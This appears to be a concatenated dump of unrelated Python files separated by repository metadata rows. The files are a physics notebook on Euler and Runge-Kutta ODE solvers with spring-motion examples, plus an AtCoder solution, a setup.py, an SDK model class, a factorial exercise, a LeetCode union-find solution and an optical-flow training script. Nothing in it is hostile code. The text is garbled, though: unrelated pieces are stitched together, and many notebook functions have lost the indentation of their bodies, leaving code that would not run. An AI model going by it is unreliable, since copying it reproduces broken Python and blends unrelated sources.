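# As code, that pair of coupled equations is just a short derivative function (a sketch with sample constants; the standard-model version appears below):
# In[ ]:
import numpy as np
k, m = 3.5, 0.2 #sample spring constant (N/m) and mass (kg)
def deriv_spring(y,t):
    #y = [x,v]; returns [dx/dt, dv/dt] for the horizontal mass on a spring
    return np.array([y[1], -k/m*y[0]])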
# ## Standard Method for Solving ODEs
# Here we develop a *standard model* for solving ODEs, which will be a blueprint for using different algorithms that have been developed. This way it takes only a minimum amount of reprogramming to change between algorithms. To start, consider the differential equation for a large wooden rabbit in free-fall with the *English pig-dogs* as the intended target:
#
# $\ddot{x} = \frac{d^2x}{dt^2} = -g$,
#
# where we've introduced the *dot* notation to make writing time derivatives a little easier, and the above equation can be broken into two first-order equations:
#
# $\dot{x} = \frac{dx}{dt} = v$
#
# and
#
# $\dot{v} = \frac{dv}{dt} = -g$.
#
# The individual Euler solutions to those first-order equations are:
#
# $x_{i+1} = x_i + \dot{x}\Delta t$
#
# and
#
# $v_{i+1} = v_i + \dot{v}\Delta t$.
#
# There is a symmetry (which will help in producing code later) that lets you write them as a single vector equation:
#
# $y_{i+1} = y_i + \dot{y}\Delta t$,
#
# where $y = [x,v]$ and $\dot{y} = [v,-g]$. By writing the equations as vectors, we can better define the problem and change our thinking into one where **states** evolve. Let's turn this into code:
# In[2]:
import numpy as np
def deriv_freefall(y,t):
#function to define the derivatives need to solve the problem of free-fall
#y is the current state and holds the variables [x,v] (position and first derivative)
#t is the current time; not really used but kept for consistency
yprime = np.zeros(len(y)) #derivative vector to be returned
yprime[0] = y[1] #store the velocity
yprime[1] = -9.8 #store the acceleration
return yprime
def Euler(y,t,dt,derivs):
#function to implement Euler's method given the
#y = [x,v] current state
#t = current time
#dt = time step
#derivs = derivative function that defines the problem
y_next = y + derivs(y,t)*dt
return y_next
# The above functions include the time $t$ in their arguments, but it is not used in either function. This is on purpose: we want to create a general method, and in other problems the time variable could be more important. Note also that the derivative function we created, *deriv_freefall*, is specific to the problem at hand, while the *Euler* function is completely general.
# Using our standard method, let's put everything together to solve the mass-on-a-spring problem, but vertically. **Will the forces be different?**
#
# Let's define the problem using code and see what we get:
# In[10]:
#SHO_Euler.py; Simple Harmonic motion (vertical mass on a spring)
import numpy as np
import matplotlib.pyplot as plt
N = 1000 #number of steps to take
y_o = 0. #initial position (spring unstretched)
v_o = 0. #starting at rest
tau = 3. #total time for simulation (in seconds)
h = tau/float(N-1) #time step
k = 3.5 #spring constant (in N/m)
m = 0.2 #mass (in kg)
g = 9.8 #gravity (in m/s^2); new force since the spring is now vertical
states_Euler = np.zeros((N,2)) #storage for each state (used for plotting later)
times = np.arange(0,tau+h,h)
states_Euler[0,:] = [y_o,v_o] #set initial state (for completeness)
def Euler(y,t,h,derivs):
#function to implement Euler's method
#y = [x,v] current state
#t = current time
#h = time step
#derivs = derivative function that defines the problem
y_next = y + derivs(y,t)*h
return y_next
def SHO(x,time):
#Simple Harmonic Oscillator
#x = [y_t,v_t]; t = time (unused)
#2nd order eqn: dy^2/dt^2 = -k/m y - g
yp = np.zeros(2) #initialize return state
yp[0] = x[1] #dy/dt = v_t
yp[1] = -k/m*x[0] - g #dv/dt = -k/m y - g
return yp
for j in range(0,N-1):
#We obtain the j+1 state by feeding the j state to Euler
    states_Euler[j+1,:] = Euler(states_Euler[j,:],times[j],h,SHO)
#Now let's visualize our results
fig = plt.figure(1,figsize=(6,12))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(times,states_Euler[:,0],'r.',ms=10)
ax2.plot(times,states_Euler[:,1],'b.',ms=10)
ax1.set_xlim(0,tau)
ax2.set_xlim(0,tau)
ax1.set_ylabel("y (m)",fontsize=20)
ax2.set_ylabel("$v_y$ (m/s)", fontsize=20)
ax2.set_xlabel("Time (s)",fontsize=20)
# Notice that we defined our time step using the total time and the number of steps. **What do you think will happen if we increase the time or decrease the number of steps?** **Will the results be very different?**
#
# ## Runge-Kutta Methods
# The most popular and general technique for solving ODEs is a set of methods called *Runge-Kutta* or **rk** methods. The Runge-Kutta algorithms for integrating a differential equation are based upon the formal (exact) integral of a differential equation:
#
# $\frac{dy}{dt} = f(t,y) \implies y(t) = \int f(t,y) dt$
#
# $\Rightarrow y_{n+1} = y_n + \displaystyle \int_{t_n}^{t_{n+1}} f(t,y) dt$.
#
# To derive the second-order Runge-Kutta algorithm (**rk2**), we expand $f(t,y)$ in a Taylor series about the *midpoint* of the integration interval and retain two terms:
#
# $f(t,y) \simeq f(t_{n+1/2},y_{n+1/2}) + (t-t_{n+1/2})\frac{df}{dt}(t_{n+1/2}) + O(h^2)$.
#
# Because ($t-t_{n+1/2}$) to any odd power is symmetric (equally positive and negative) over the interval $t_n\leq t \leq t_{n+1}$, the integral of the second term with ($t-t_{n+1/2}$) vanishes and we obtain our algorithm:
#
# $\displaystyle \int_{t_n}^{t_{n+1}} f(t,y) dt \simeq f(t_{n+1/2},y_{n+1/2})h + O(h^3)$,
#
# $\implies y_{n+1} \simeq y_n + f(t_{n+1/2},y_{n+1/2})h + O(h^3)$ (**rk2**).
#
# We should notice that while **rk2** contains the same number of terms as Euler's rule, it obtains a higher level of precision by taking advantage of the cancelation of the $O(h)$ terms (recall something similar happened when comparing Trapezoid to Simpson's rule). The price for improved precision is having to evaluate the derivative function and $y$ at the middle of the time interval, $t = t_n + h/2$. But, we don't have a function to evaluate at this point! The way out of this quagmire is to use Euler's algorithm for the midpoint $y_{n+1/2}$:
#
# $y_{n+1/2} \simeq y_n + \frac{h}{2}\frac{dy}{dt}=y_n + \frac{h}{2}f(t_n,y_n)$.
#
# Combining the above expression with our equation for **rk2**, we get:
#
# $y_{n+1} \simeq y_n + k_2$, (**rk2**)
#
# $k_2 = hf(t_n+h/2,y_n+k_1/2),\;\;\;\;k_1 = hf(t_n,y_n)$,
#
# where $y$ is a state vector (and hence $f(t,y)$ is a state vector too). The known derivative function $\frac{dy}{dt} = f(t,y)$ is evaluated at the ends and the midpoint of the interval, but only the known initial value of the $y$ is required. This makes the algorithm self-starting. Just like how we expanded our integration methods to consider more steps, we can do the same with **rk2** to get **rk4**. Here is the algorithm for **rk4**:
#
# $y_{n+1} = y_n + \frac{1}{6}(k_1 + 2k_2 + 2k_3 + k_4)$,
#
# $k_1 = hf(t_n,y_n),\;\;\;\;k_2 = hf(t_n+h/2,y_n+k_1/2)$,
#
# $k_3 = hf(t_n+h/2,y_n+k_2/2),\;\;\;\;k_4 = hf(t_n+h,y_n+k_3)$.
#
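# For comparison, here is a minimal **rk2** stepper, a sketch built directly from the formulas above and drop-in compatible with our standard model (same signature as *Euler*):
# In[ ]:
def rk2(y,t,h,derivs):
    #function to implement rk2
    #y = [x,v] current state
    #t = current time
    #h = time step
    #derivs = derivative function that defines the problem
    k1 = h*derivs(y,t)
    k2 = h*derivs(y + k1/2.,t + h/2.) #slope at the midpoint via an Euler half step
    y_next = y + k2
    return y_next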
# Let's now apply **rk4** to our previous problem of the mass on a spring in code!
# In[19]:
#SHO_rk4.py; Simple Harmonic motion (vertical mass on a spring)
import numpy as np
import matplotlib.pyplot as plt
N = 1000 #number of steps to take
y_o = 0. #initial position (spring unstretched)
v_o = 0. #starting at rest
tau = 3. #total time for simulation (in seconds)
h = tau/float(N-1) #time step
k = 3.5 #spring constant (in N/m)
m = 0.2 #mass (in kg)
g = 9.8 #gravity (in m/s^2); new force since the spring is now vertical
states_rk4 = np.zeros((N,2)) #storage for each state (used for plotting later)
times = np.arange(0,tau+h,h)
states_rk4[0,:] = [y_o,v_o] #set initial state (for completeness)
def rk4(y,t,h,derivs):
#function to implement rk4
#y = [x,v] current state
#t = current time
#h = time step
#derivs = derivative function that defines the problem
k1 = h*derivs(y,t)
y_halfstep = y + k1/2. #Euler half step using k1
k2 = h*derivs(y_halfstep,t+h/2)
y_halfstep = y + k2/2. #Euler half step using k2
k3 = h*derivs(y_halfstep,t+h/2)
k4 = h*derivs(y + k3,t+h) #full step using k3
y_next = y + (k1+2*k2+2*k3+k4)/6.
return y_next
def SHO(x,time):
#Simple Harmonic Oscillator
#x = [y_t,v_t]; t = time (unused)
#2nd order eqn: dy^2/dt^2 = -k/m y - g
yp = np.zeros(2) #initialize return state
yp[0] = x[1] #dy/dt = v_t
yp[1] = -k/m*x[0] - g #dv/dt = -k/m y - g
return yp
for j in range(0,N-1):
#We obtain the j+1 state by feeding the j state to rk4
states_rk4[j+1,:] = rk4(states_rk4[j,:],times[j],h,SHO)
#Now let's visualize our results
fig = plt.figure(1,figsize=(6,12))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(times,states_rk4[:,0]-states_Euler[:,0],'r.',ms=10)
ax2.plot(times,states_rk4[:,1]-states_Euler[:,1],'b.',ms=10)
#ax1.plot(times,states_rk4[:,0],'r.',ms=10)
#ax2.plot(times,states_rk4[:,1],'b.',ms=10)
ax1.set_xlim(0,tau)
ax2.set_xlim(0,tau)
ax1.set_ylabel("y (m)",fontsize=20)
ax2.set_ylabel("$v_y$ (m/s)", fontsize=20)
ax2.set_xlabel("Time (s)",fontsize=20)
# The above plots show the differences between **Euler** and **rk4**, where the solutions for the position are virtually identical, but the differences in velocity are more substantial. The **rk4** method is the more accurate and versatile of the two. There are higher-order methods with adaptive step sizes, which you can find in [scipy.integrate](https://docs.scipy.org/doc/scipy/reference/integrate.html). Here is an example call
#
# scipy.integrate.RK45(fun, t0, y0, t_bound=tau, max_step=h, rtol=0.001, atol=1e-06),
#
# where fun defines the derivative function (SHO in our case), t0 is the initial time, y0 is the initial **state**, t_bound is the final time, max_step is the maximum step size that we limit to h, rtol is a relative error tolerance level, and atol is the absolute error tolerance level.
#
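# As a quick sketch of that interface (note that SciPy expects the derivative as $f(t, y)$, with time as the first argument, unlike our SHO function above):
# In[ ]:
from scipy.integrate import RK45
def SHO_scipy(t,y):
    #same vertical mass on a spring, but with scipy's (t, y) argument order
    return np.array([y[1], -k/m*y[0] - g])
solver = RK45(SHO_scipy, t0=0., y0=np.array([y_o, v_o]), t_bound=tau, max_step=h)
t_hist, y_hist = [solver.t], [solver.y]
while solver.status == 'running':
    solver.step() #take one adaptive step
    t_hist.append(solver.t)
    y_hist.append(solver.y)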
# Let's evaluate a more difficult problem using the mass on a spring, where we include a friction coefficient.
# In[37]:
#SHO_rk4_friction.py; Simple Harmonic motion (vertical mass on a spring)
import numpy as np
import matplotlib.pyplot as plt
N = 1000 #number of steps to take
y_o = 0.2 #initial position (spring unstretched)
v_o = 0. #starting at rest
tau = 3. #total time for simulation (in seconds)
h = tau/float(N-1) #time step
k = 42 #spring constant (in N/m)
m = 0.25 #mass (in kg)
g = 9.8 #gravity (in m/s^2); new force since the spring is now vertical
mu = 0.15 #coefficient of friction
states_rk4_fric = np.zeros((N,2)) #storage for each state (used for plotting later)
times = np.arange(0,tau+h,h)
states_rk4_fric[0,:] = [y_o,v_o] #set initial state (for completeness)
def rk4(y,t,h,derivs):
#function to implement rk4
#y = [x,v] current state
#t = current time
#h = time step
#derivs = derivative function that defines the problem
k1 = h*derivs(y,t)
y_halfstep = y + k1/2. #Euler half step using k1
k2 = h*derivs(y_halfstep,t+h/2)
y_halfstep = y + k2/2. #Euler half step using k2
k3 = h*derivs(y_halfstep,t+h/2)
k4 = h*derivs(y + k3,t+h) #full step using k3
y_next = y + (k1+2*k2+2*k3+k4)/6.
return y_next
def SHO(x,time):
#Simple Harmonic Oscillator
#x = [y_t,v_t]; t = time (unused)
#2nd order eqn: dy^2/dt^2 = -k/m y - g
yp = np.zeros(2) #initialize return state
yp[0] = x[1] #dy/dt = v_t
    if yp[0] > 0: #velocity is positive; friction opposes the upward motion
        yp[1] = -k/m*x[0] - g*mu #dv/dt = -k/m y - g mu; w/friction
    else: #velocity is negative or zero; friction opposes the downward motion
        yp[1] = -k/m*x[0] + g*mu #dv/dt = -k/m y + g mu; w/friction
return yp
for j in range(0,N-1):
#We obtain the j+1 state by feeding the j state to rk4
states_rk4_fric[j+1,:] = rk4(states_rk4_fric[j,:],times[j],h,SHO)
#Now let's visualize our results
fig = plt.figure(1,figsize=(6,12))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
#ax1.plot(times,states_rk4[:,0],'k.',ms=10)
#ax2.plot(times,states_rk4[:,1],'k.',ms=10)
ax1.plot(times,states_rk4_fric[:,0],'r.',ms=10)
ax2.plot(times,states_rk4_fric[:,1],'b.',ms=10)
ax1.set_xlim(0,tau)
ax2.set_xlim(0,tau)
ax1.set_ylabel("y (m)",fontsize=20)
ax2.set_ylabel("$v_y$ (m/s)", fontsize=20)
ax2.set_xlabel("Time (s)",fontsize=20)
# ## Problems
#
# - Complete the following problems in a Jupyter notebook, where you will save your results as an external file (*.png) as needed.
# - Create a LaTex document in RevTex with:
# - an abstract summary
# - sections for each problem that state the problem, summarize what you did, and display the results
# - include a reference for each solution (this can be textbooks)
#
# 1. Express each of these differential equations as a set of [first-order differential equations](https://tutorial.math.lamar.edu/classes/de/systemsde.aspx) and write an appropriate derivs function:
# - $m\ddot{x} = f(x,t)$
# - $A\ddot{x} + B\dot{x} + Cx = D$
# - $m\ddot{\theta} = -\sqrt{g/L}\sin \theta - \beta\dot{\theta}+ \gamma\sin \omega t$
#
# 2. Write a Python program to study projectile motion without air resistance using **rk4**. Then apply your program to the following scenario:
#
# - You are a pirate cannoneer and your Captain (*Jack Sparrow*) has ordered you to fire the cannon to escape the clutches of Davy Jones. Your Captain wants to make a quick getaway because he knows of the stench from the Kraken. Thus, you must make a direct hit on the first shot. The cannon has a muzzle speed of about 400 m/s and the firing deck is 15 m above sea level. The Captain is sailing at max speed, where Davy Jones is matching Sparrow's velocity and keeping a constant 12.2 km between your cannon and his bow. The main mast of the Flying Dutchman is located an additional 25 m beyond the bow.
#
# a. At what angle (from the horizontal) must you fire the cannon to hit the mast of the Flying Dutchman?
#
# b. What is the maximum height (from sea level) will the cannonball fly?
#
# c. Compare your results to expectations from theory (i.e., the kinematics you learned in pirate school). Plot the trajectory (x,y), maximum height, and range determined from your program along with analytic values.
#
# 3. Write a Python program to evaluate the [Lorenz system](https://en.wikipedia.org/wiki/Lorenz_system) using **rk4**. The differential equations are:
# - $\frac{dx}{dt} = \sigma(y-x)$,
# - $\frac{dy}{dt} = x(\rho-z) - y$,
# - $\frac{dz}{dt} = xy - \beta z$.
#
# a. Assume that $\sigma = 10$ and $\beta = 8/3$, but $\rho = [13,14,15,28]$. Evaluate using each value of $\rho$ separately.
#
# b. Plot the z vs. x plane of the above solutions.
| 48.417949
| 655
| 0.685961
|
4a14631e5f521f02169d8596d2af041aa2ce8a68
| 351
|
py
|
Python
|
submissions/abc170/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc170/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc170/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
def main():
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
x = list(map(int, readline().split()))
for i in range(1, 6):
if i not in x:
print(i)
break
if __name__ == '__main__':
main()
| 20.647059
| 42
| 0.575499
|
4a1464012f7bcfd797cf0bb01e0669ec478a9392
| 820
|
py
|
Python
|
setup.py
|
Configgery/python-configgery-client
|
c5b7b59d21f3165404c1f9f1d978d94a6ea49913
|
[
"MIT"
] | null | null | null |
setup.py
|
Configgery/python-configgery-client
|
c5b7b59d21f3165404c1f9f1d978d94a6ea49913
|
[
"MIT"
] | null | null | null |
setup.py
|
Configgery/python-configgery-client
|
c5b7b59d21f3165404c1f9f1d978d94a6ea49913
|
[
"MIT"
] | 1
|
2022-01-06T00:17:32.000Z
|
2022-01-06T00:17:32.000Z
|
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="configgery-client",
version="1.0.2",
author="Configgery Pty Ltd",
author_email="support@configgery.com",
description="Python client for devices interacting with configgery.com",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Configgery/configgery-client-python",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir={"": "src"},
packages=setuptools.find_packages(where="src"),
python_requires=">=3.6",
install_requires=[
"urllib3>=1.21.1"
],
)
| 30.37037
| 76
| 0.662195
|
4a14640746298e15eda12871195d03e1636f3d76
| 9,246
|
py
|
Python
|
build/PureCloudPlatformClientV2/models/contact_list_filter_predicate.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/models/contact_list_filter_predicate.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/models/contact_list_filter_predicate.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class ContactListFilterPredicate(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
ContactListFilterPredicate - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'column': 'str',
'column_type': 'str',
'operator': 'str',
'value': 'str',
'range': 'ContactListFilterRange',
'inverted': 'bool'
}
self.attribute_map = {
'column': 'column',
'column_type': 'columnType',
'operator': 'operator',
'value': 'value',
'range': 'range',
'inverted': 'inverted'
}
self._column = None
self._column_type = None
self._operator = None
self._value = None
self._range = None
self._inverted = None
@property
def column(self):
"""
Gets the column of this ContactListFilterPredicate.
Contact list column from the ContactListFilter's contactList.
:return: The column of this ContactListFilterPredicate.
:rtype: str
"""
return self._column
@column.setter
def column(self, column):
"""
Sets the column of this ContactListFilterPredicate.
Contact list column from the ContactListFilter's contactList.
:param column: The column of this ContactListFilterPredicate.
:type: str
"""
self._column = column
@property
def column_type(self):
"""
Gets the column_type of this ContactListFilterPredicate.
The type of data in the contact column.
:return: The column_type of this ContactListFilterPredicate.
:rtype: str
"""
return self._column_type
@column_type.setter
def column_type(self, column_type):
"""
Sets the column_type of this ContactListFilterPredicate.
The type of data in the contact column.
:param column_type: The column_type of this ContactListFilterPredicate.
:type: str
"""
allowed_values = ["numeric", "alphabetic"]
if column_type.lower() not in map(str.lower, allowed_values):
# print("Invalid value for column_type -> " + column_type)
self._column_type = "outdated_sdk_version"
else:
self._column_type = column_type
@property
def operator(self):
"""
Gets the operator of this ContactListFilterPredicate.
The operator for this ContactListFilterPredicate.
:return: The operator of this ContactListFilterPredicate.
:rtype: str
"""
return self._operator
@operator.setter
def operator(self, operator):
"""
Sets the operator of this ContactListFilterPredicate.
The operator for this ContactListFilterPredicate.
:param operator: The operator of this ContactListFilterPredicate.
:type: str
"""
allowed_values = ["EQUALS", "LESS_THAN", "LESS_THAN_EQUALS", "GREATER_THAN", "GREATER_THAN_EQUALS", "CONTAINS", "BEGINS_WITH", "ENDS_WITH", "BEFORE", "AFTER", "BETWEEN", "IN"]
if operator.lower() not in map(str.lower, allowed_values):
# print("Invalid value for operator -> " + operator)
self._operator = "outdated_sdk_version"
else:
self._operator = operator
@property
def value(self):
"""
Gets the value of this ContactListFilterPredicate.
Value with which to compare the contact's data. This could be text, a number, or a relative time. A value for relative time should follow the format PxxDTyyHzzM, where xx, yy, and zz specify the days, hours and minutes. For example, a value of P01DT08H30M corresponds to 1 day, 8 hours, and 30 minutes from now. To specify a time in the past, include a negative sign before each numeric value. For example, a value of P-01DT-08H-30M corresponds to 1 day, 8 hours, and 30 minutes in the past. You can also do things like P01DT00H-30M, which would correspond to 23 hours and 30 minutes from now (1 day - 30 minutes).
:return: The value of this ContactListFilterPredicate.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of this ContactListFilterPredicate.
Value with which to compare the contact's data. This could be text, a number, or a relative time. A value for relative time should follow the format PxxDTyyHzzM, where xx, yy, and zz specify the days, hours and minutes. For example, a value of P01DT08H30M corresponds to 1 day, 8 hours, and 30 minutes from now. To specify a time in the past, include a negative sign before each numeric value. For example, a value of P-01DT-08H-30M corresponds to 1 day, 8 hours, and 30 minutes in the past. You can also do things like P01DT00H-30M, which would correspond to 23 hours and 30 minutes from now (1 day - 30 minutes).
:param value: The value of this ContactListFilterPredicate.
:type: str
"""
self._value = value
@property
def range(self):
"""
Gets the range of this ContactListFilterPredicate.
A range of values. Required for operators BETWEEN and IN.
:return: The range of this ContactListFilterPredicate.
:rtype: ContactListFilterRange
"""
return self._range
@range.setter
def range(self, range):
"""
Sets the range of this ContactListFilterPredicate.
A range of values. Required for operators BETWEEN and IN.
:param range: The range of this ContactListFilterPredicate.
:type: ContactListFilterRange
"""
self._range = range
@property
def inverted(self):
"""
Gets the inverted of this ContactListFilterPredicate.
Inverts the result of the predicate (i.e., if the predicate returns true, inverting it will return false).
:return: The inverted of this ContactListFilterPredicate.
:rtype: bool
"""
return self._inverted
@inverted.setter
def inverted(self, inverted):
"""
Sets the inverted of this ContactListFilterPredicate.
Inverts the result of the predicate (i.e., if the predicate returns true, inverting it will return false).
:param inverted: The inverted of this ContactListFilterPredicate.
:type: bool
"""
self._inverted = inverted
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 34.371747
| 622
| 0.615509
|
4a146453de50f8d311f3098ba7bfcee22555800b
| 356
|
py
|
Python
|
ex060.py
|
igormba/python-exercises
|
000190c4b62dc64bbb2fb039a103890945b88fa5
|
[
"MIT"
] | null | null | null |
ex060.py
|
igormba/python-exercises
|
000190c4b62dc64bbb2fb039a103890945b88fa5
|
[
"MIT"
] | null | null | null |
ex060.py
|
igormba/python-exercises
|
000190c4b62dc64bbb2fb039a103890945b88fa5
|
[
"MIT"
] | null | null | null |
'''Write a program that reads any number and shows its factorial.
Ex: 5! = 5x4x3x2x1 = 120'''
from math import factorial
n = int(input('Enter a number: '))
c = n
print('Computing {}! = '.format(n), end=' ')
while c > 0:
print('{}'.format(c), end=' ')
print(' x ' if c > 1 else ' = ', end=' ')
c -= 1
print('{}'.format(factorial(n)))
| 29.666667
| 72
| 0.581461
|
4a14658295447a21b5532ee9f7106e0c378d613f
| 2,073
|
py
|
Python
|
code/ch05/5.2.4-number-of-islands.py
|
leetcode-pp/leetcode-pp1
|
a1f9e46fdd2f480d2fcb94e76370e040e0f0a4f5
|
[
"MIT"
] | 22
|
2021-02-23T13:42:28.000Z
|
2022-03-02T11:19:28.000Z
|
code/ch05/5.2.4-number-of-islands.py
|
leetcode-pp/leetcode-pp1
|
a1f9e46fdd2f480d2fcb94e76370e040e0f0a4f5
|
[
"MIT"
] | 9
|
2021-06-16T10:42:01.000Z
|
2021-08-24T09:06:29.000Z
|
code/ch05/5.2.4-number-of-islands.py
|
leetcode-pp/leetcode-pp1
|
a1f9e46fdd2f480d2fcb94e76370e040e0f0a4f5
|
[
"MIT"
] | 9
|
2021-02-20T08:29:00.000Z
|
2021-09-18T08:52:25.000Z
|
from typing import List
class Solution:
class UnionFind:
def __init__(self, grid):
self.count = 0
m = len(grid)
n = len(grid[0])
self.parent = [0 for _ in range(m * n)]
self.rank = [0 for _ in range(m * n)]
            for i in range(m): # initialization: each land cell starts as its own root
for j in range(n):
if grid[i][j] == "1":
self.parent[i * n + j] = i * n + j
self.count += 1
def find(self, i):
if self.parent[i] != i:
self.parent[i] = self.find(self.parent[i])
return self.parent[i]
def union(self, x, y):
rootx = self.find(x)
rooty = self.find(y)
if rootx != rooty:
if self.rank[rootx] > self.rank[rooty]:
self.parent[rooty] = rootx
elif self.rank[rootx] < self.rank[rooty]:
self.parent[rootx] = rooty
else:
self.parent[rooty] = rootx
self.rank[rootx] += 1
self.count -= 1
def getCount(self):
return self.count
def numIslands(self, grid: List[List[str]]) -> int:
if not grid or not grid[0]:
return 0
# ans = 0
nr = len(grid)
nc = len(grid[0])
uf = self.UnionFind(grid)
for i in range(nr):
for j in range(nc):
if grid[i][j] == "1":
grid[i][j] = "0"
if i - 1 >= 0 and grid[i - 1][j] == "1":
uf.union(i * nc + j, (i - 1) * nc + j)
if i + 1 < nr and grid[i + 1][j] == "1":
uf.union(i * nc + j, (i + 1) * nc + j)
if j - 1 >= 0 and grid[i][j - 1] == "1":
uf.union(i * nc + j, i * nc + j - 1)
if j + 1 < nc and grid[i][j + 1] == "1":
uf.union(i * nc + j, i * nc + j + 1)
return uf.getCount()
| 33.435484
| 62
| 0.387844
|
4a146721b7a25fd43192d67da0d185a0d2c52dff
| 5,344
|
py
|
Python
|
sr-pwc/scripts/finetune_srpwc_things.py
|
ashariati/srfnet
|
2171a635006d3ac98e39a9f07c17027b70e5aead
|
[
"MIT"
] | null | null | null |
sr-pwc/scripts/finetune_srpwc_things.py
|
ashariati/srfnet
|
2171a635006d3ac98e39a9f07c17027b70e5aead
|
[
"MIT"
] | null | null | null |
sr-pwc/scripts/finetune_srpwc_things.py
|
ashariati/srfnet
|
2171a635006d3ac98e39a9f07c17027b70e5aead
|
[
"MIT"
] | null | null | null |
import sys
import os
import pprint
import math
import PIL
import numpy as np
import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
import torchvision
import torchvision.transforms as transforms
import torchvision.utils as vutils
import tensorboardX
from tensorboardX import SummaryWriter
sys.path.append('..')
import data_utils
from data_utils import Sintel
from data_utils import FlyingChairs
from data_utils import FlyingThings
import flow_utils
import networks
from networks import SRPWCNet
from networks import PWCNet
from networks import SRResNet
import pdb
# for maintaining consistent training/validation splits
torch.manual_seed(3607)
# training parameters
batch_size = 4
lr = 1e-5
alpha = [0.005, 0.01, 0.02]
start_epoch = 3
max_epochs = 30
log_interval = 10
save_interval = 1
pwc_end_epoch = 22
sr_end_epoch = 95
# visualizations
writer = SummaryWriter()
flowviz_transform = transforms.Compose([flow_utils.ToFlow(),
flow_utils.ToRGBImage(),
transforms.ToTensor()])
imageviz_transform = transforms.Compose([transforms.ToPILImage(),
transforms.Resize((96, 192), interpolation=PIL.Image.NEAREST),
transforms.ToTensor()])
# data transforms
sample_transforms = transforms.Compose([
transforms.Resize((24, 48)),
transforms.ToTensor()])
target_transforms = transforms.Compose([
flow_utils.ToTensor()])
# data
nvset = 500
training_set = 'flying_things'
dataset = FlyingThings('/data1/data/flying_things',
transform=sample_transforms, target_transform=target_transforms,
pyramid_levels=[2, 3, 4], flow_scale=20., crop_dim=(384, 768))
trainset, validset = torch.utils.data.random_split(dataset, (dataset.__len__() - nvset, nvset))
torch.manual_seed(3607 + start_epoch)
trainloader = DataLoader(trainset, batch_size=batch_size, num_workers=4, shuffle=True)
validloader = DataLoader(validset, batch_size=10, num_workers=4)
# setup network
model = None
if start_epoch > 0:
model = SRPWCNet(SRResNet().cuda(), PWCNet().cuda(), freeze_pwc=True).cuda()
checkpoint_file = os.path.join(os.getcwd(), 'states', training_set, 'srpwc_%d.pkl' % start_epoch)
model.load_state_dict(torch.load(checkpoint_file))
print('Loading checkpoint')
else:
pwc_model = PWCNet().cuda()
pwc_checkpoint_file = os.path.join(os.getcwd(), 'states', training_set, 'pwc_%d.pkl' % pwc_end_epoch)
pwc_model.load_state_dict(torch.load(pwc_checkpoint_file))
sr_model = SRResNet().cuda()
sr_checkpoint_file = os.path.join(os.getcwd(), 'states', 'flying_chairs', 'srresnet_%d.pkl' % sr_end_epoch)
sr_model.load_state_dict(torch.load(sr_checkpoint_file))
model = SRPWCNet(sr_model, pwc_model, freeze_pwc=True).cuda()
print('Loading initial sub networks')
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 1e5, gamma=0.5)
criterion = flow_utils.EPELoss()
